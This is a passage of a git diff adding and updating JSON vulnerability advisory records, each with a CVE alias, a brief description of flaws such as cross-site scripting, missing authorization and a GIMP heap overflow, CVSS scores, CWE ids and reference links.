"https://themes.trac.wordpress.org/browser/drift/1.5.0/admin/main/options/00.theme-setup.php#L134" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/93b53241-6556-4a67-97e6-ea30f3c4ef76?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json b/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json new file mode 100644 index 0000000000000..3bc08b8a5eb03 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xf4f-qj26-72pf", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26747" + ], + "details": "A Host Header Poisoning vulnerability exists in Monica 4.1.2 due to improper handling of the HTTP Host header in app/Providers/AppServiceProvider.php, combined with the default misconfiguration where the \"app.force_url\" is not set and default is \"false\". The application generates absolute URLs (such as those used in password reset emails) using the user-supplied Host header. This allows remote attackers to poison the password reset link sent to a victim,", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26747" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2026-26747.md" + }, + { + "type": "WEB", + "url": "https://github.com/monicahq/monica" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json b/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json new file mode 100644 index 0000000000000..be96604f860ee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xf7v-j2cc-2crf", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1941" + ], + "details": "The WP Event Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_events' shortcode in all versions up to, and including, 1.8.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1941" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L56" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L567" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L761" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L56" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L567" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L761" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3455440/wp-event-aggregator#file18" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/50d8f1e0-2022-4fe1-b384-ca762a032d3c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T09:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json b/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json index 3462e4bacb012..f88adbd5be477 100644 --- a/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json +++ b/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xfjv-gcf8-3jqc", - "modified": "2026-02-06T09:30:28Z", + "modified": "2026-02-18T18:30:23Z", "published": "2026-02-06T09:30:28Z", "aliases": [ "CVE-2026-21626" ], "details": "Access control settings for forum post custom fields are not applied to the JSON output type, leading to an ACL violation vector an information disclosure", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-xfpq-772f-h5qw/GHSA-xfpq-772f-h5qw.json b/advisories/unreviewed/2026/02/GHSA-xfpq-772f-h5qw/GHSA-xfpq-772f-h5qw.json index 5b5a2229e34fc..8b2dee24e62f5 100644 --- a/advisories/unreviewed/2026/02/GHSA-xfpq-772f-h5qw/GHSA-xfpq-772f-h5qw.json +++ b/advisories/unreviewed/2026/02/GHSA-xfpq-772f-h5qw/GHSA-xfpq-772f-h5qw.json @@ -58,7 +58,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-xfv7-f3m9-5h58/GHSA-xfv7-f3m9-5h58.json b/advisories/unreviewed/2026/02/GHSA-xfv7-f3m9-5h58/GHSA-xfv7-f3m9-5h58.json new file mode 100644 index 0000000000000..6575115526aed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xfv7-f3m9-5h58/GHSA-xfv7-f3m9-5h58.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xfv7-f3m9-5h58", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-25003" + ], + "details": "Missing Authorization vulnerability in madalin.ungureanu Client Portal client-portal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Client Portal: from n/a through <= 1.2.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25003" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/client-portal/vulnerability/wordpress-client-portal-plugin-1-2-1-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json b/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json new file mode 100644 index 0000000000000..8530d1187e7be --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xfxx-38qx-mrf4/GHSA-xfxx-38qx-mrf4.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xfxx-38qx-mrf4", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22357" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spencer Haws Link Whisper Free link-whisper allows Reflected XSS.This issue affects Link Whisper Free: from n/a through <= 0.9.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22357" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/link-whisper/vulnerability/wordpress-link-whisper-free-plugin-0-9-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json b/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json new file mode 100644 index 0000000000000..e723a1688579b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xg7c-7v8p-8ww8/GHSA-xg7c-7v8p-8ww8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xg7c-7v8p-8ww8", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69302" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designthemes DesignThemes Core Features designthemes-core-features allows Reflected XSS.This issue affects DesignThemes Core Features: from n/a through <= 2.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69302" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/designthemes-core-features/vulnerability/wordpress-designthemes-core-features-plugin-2-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xgmj-j94q-46cv/GHSA-xgmj-j94q-46cv.json b/advisories/unreviewed/2026/02/GHSA-xgmj-j94q-46cv/GHSA-xgmj-j94q-46cv.json new file mode 100644 index 0000000000000..9184913deb4ea --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xgmj-j94q-46cv/GHSA-xgmj-j94q-46cv.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xgmj-j94q-46cv", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24946" + ], + "details": "Missing Authorization vulnerability in tychesoftwares Print Invoice & Delivery Notes for WooCommerce woocommerce-delivery-notes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Print Invoice & Delivery Notes for WooCommerce: from n/a through <= 5.8.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24946" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-delivery-notes/vulnerability/wordpress-print-invoice-delivery-notes-for-woocommerce-plugin-5-8-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xgvq-3q42-wr4g/GHSA-xgvq-3q42-wr4g.json b/advisories/unreviewed/2026/02/GHSA-xgvq-3q42-wr4g/GHSA-xgvq-3q42-wr4g.json new file mode 100644 index 0000000000000..7c50124160162 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xgvq-3q42-wr4g/GHSA-xgvq-3q42-wr4g.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xgvq-3q42-wr4g", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-23549" + ], + "details": "Deserialization of Untrusted Data vulnerability in magepeopleteam WpEvently mage-eventpress allows Object Injection.This issue affects WpEvently: from n/a through <= 5.1.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23549" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/mage-eventpress/vulnerability/wordpress-wpevently-plugin-5-1-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xhcq-9mcp-rrvr/GHSA-xhcq-9mcp-rrvr.json b/advisories/unreviewed/2026/02/GHSA-xhcq-9mcp-rrvr/GHSA-xhcq-9mcp-rrvr.json new file mode 100644 index 0000000000000..58c39b42e59a2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xhcq-9mcp-rrvr/GHSA-xhcq-9mcp-rrvr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xhcq-9mcp-rrvr", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2047" + ], + "details": "GIMP ICNS File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of ICNS files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28530.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2047" + }, + { + "type": "WEB", + "url": "https://gitlab.gnome.org/GNOME/gimp/-/merge_requests/2600/diffs?commit_id=dd2faac351f1ff2588529fedc606e6a5f815577c" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-120" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xj2q-cpcq-554c/GHSA-xj2q-cpcq-554c.json b/advisories/unreviewed/2026/02/GHSA-xj2q-cpcq-554c/GHSA-xj2q-cpcq-554c.json new file mode 100644 index 0000000000000..a3a01f4e4df9c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xj2q-cpcq-554c/GHSA-xj2q-cpcq-554c.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj2q-cpcq-554c", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25414" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the ID parameter. Attackers can craft requests to the /manage/ips/appid/ endpoint with script payloads in the ID parameter to execute arbitrary JavaScript in victim browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25414" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-reflected-cross-site-scripting-via-id-parameter-appid" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xj5x-4c9j-jr89/GHSA-xj5x-4c9j-jr89.json b/advisories/unreviewed/2026/02/GHSA-xj5x-4c9j-jr89/GHSA-xj5x-4c9j-jr89.json new file mode 100644 index 0000000000000..e7bff5ad48ee1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xj5x-4c9j-jr89/GHSA-xj5x-4c9j-jr89.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj5x-4c9j-jr89", + "modified": "2026-02-20T03:31:39Z", + "published": "2026-02-20T03:31:39Z", + "aliases": [ + "CVE-2025-30412" + ], + "details": "Sensitive data disclosure and manipulation due to improper authentication. The following products are affected: Acronis Cyber Protect 16 (Linux, Windows) before build 39938, Acronis Cyber Protect 15 (Linux, Windows) before build 41800.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30412" + }, + { + "type": "WEB", + "url": "https://security-advisory.acronis.com/advisories/SEC-8598" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1390" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T01:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json b/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json new file mode 100644 index 0000000000000..857d992cdfa7a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj75-gfvf-4g86", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-1272" + ], + "details": "The Linux Kernel lockdown mode for kernel versions starting on 6.12 and above for Fedora Linux has the lockdown mode disabled without any warning. This may allow an attacker to gain access to sensitive information such kernel memory mappings, I/O ports, BPF and kprobes. Additionally unsigned modules can be loaded, leading to execution of untrusted code breaking breaking any Secure Boot protection. This vulnerability affects only Fedora Linux.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1272" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:6966" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-1272" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345615" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xj9r-5fj6-ggxg/GHSA-xj9r-5fj6-ggxg.json b/advisories/unreviewed/2026/02/GHSA-xj9r-5fj6-ggxg/GHSA-xj9r-5fj6-ggxg.json new file mode 100644 index 0000000000000..6c3f0e4cdefbb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xj9r-5fj6-ggxg/GHSA-xj9r-5fj6-ggxg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj9r-5fj6-ggxg", + "modified": "2026-02-19T18:31:52Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25323" + ], + "details": "Missing Authorization vulnerability in MiKa OSM osm allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects OSM: from n/a through <= 6.1.12.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25323" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/osm/vulnerability/wordpress-osm-plugin-6-1-12-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xjfr-756p-4phv/GHSA-xjfr-756p-4phv.json b/advisories/unreviewed/2026/02/GHSA-xjfr-756p-4phv/GHSA-xjfr-756p-4phv.json new file mode 100644 index 0000000000000..cc3fd1a4470a1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xjfr-756p-4phv/GHSA-xjfr-756p-4phv.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xjfr-756p-4phv", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-23608" + ], + "details": "GFI MailEssentials AI versions prior to 22.4 contain a stored cross-site scripting vulnerability in the Mail Monitoring rule creation endpoint. An authenticated user can supply HTML/JavaScript in the JSON \\\"name\\\" field to /MailEssentials/pages/MailSecurity/MailMonitoring.aspx/Save, which is stored and later rendered in the management interface, allowing script execution in the context of a logged-in user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23608" + }, + { + "type": "WEB", + "url": "https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gfi-mailessentials-ai-email-management-mail-monitoring-rule-stored-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:24:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json b/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json index c4fbde5492dcc..9a34bbdf7d186 100644 --- a/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json +++ b/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-xm99-mgxp-q9jf/GHSA-xm99-mgxp-q9jf.json b/advisories/unreviewed/2026/02/GHSA-xm99-mgxp-q9jf/GHSA-xm99-mgxp-q9jf.json new file mode 100644 index 0000000000000..6e96e65be87a2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xm99-mgxp-q9jf/GHSA-xm99-mgxp-q9jf.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xm99-mgxp-q9jf", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25406" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the organization parameter. Attackers can send POST requests to the korugan/cmclient endpoint with script payloads in the organization parameter to execute arbitrary JavaScript in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25406" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-reflected-cross-site-scripting-via-organization-parameter" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xmx2-52xv-386p/GHSA-xmx2-52xv-386p.json b/advisories/unreviewed/2026/02/GHSA-xmx2-52xv-386p/GHSA-xmx2-52xv-386p.json new file mode 100644 index 0000000000000..5510e9bd4de53 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xmx2-52xv-386p/GHSA-xmx2-52xv-386p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xmx2-52xv-386p", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2025-14427" + ], + "details": "The Shield Security: Blocks Bots, Protects Users, and Prevents Security Breaches plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `MfaEmailDisable` action in all versions up to, and including, 21.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disable the global Email 2FA setting for the entire site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14427" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3439494%40wp-simple-firewall&new=3439494%40wp-simple-firewall&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/91dbc521-c24b-4b73-9b70-46d363ccb535?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xmxf-f859-45ch/GHSA-xmxf-f859-45ch.json b/advisories/unreviewed/2026/02/GHSA-xmxf-f859-45ch/GHSA-xmxf-f859-45ch.json new file mode 100644 index 0000000000000..0af14e86b4560 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xmxf-f859-45ch/GHSA-xmxf-f859-45ch.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xmxf-f859-45ch", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25333" + ], + "details": 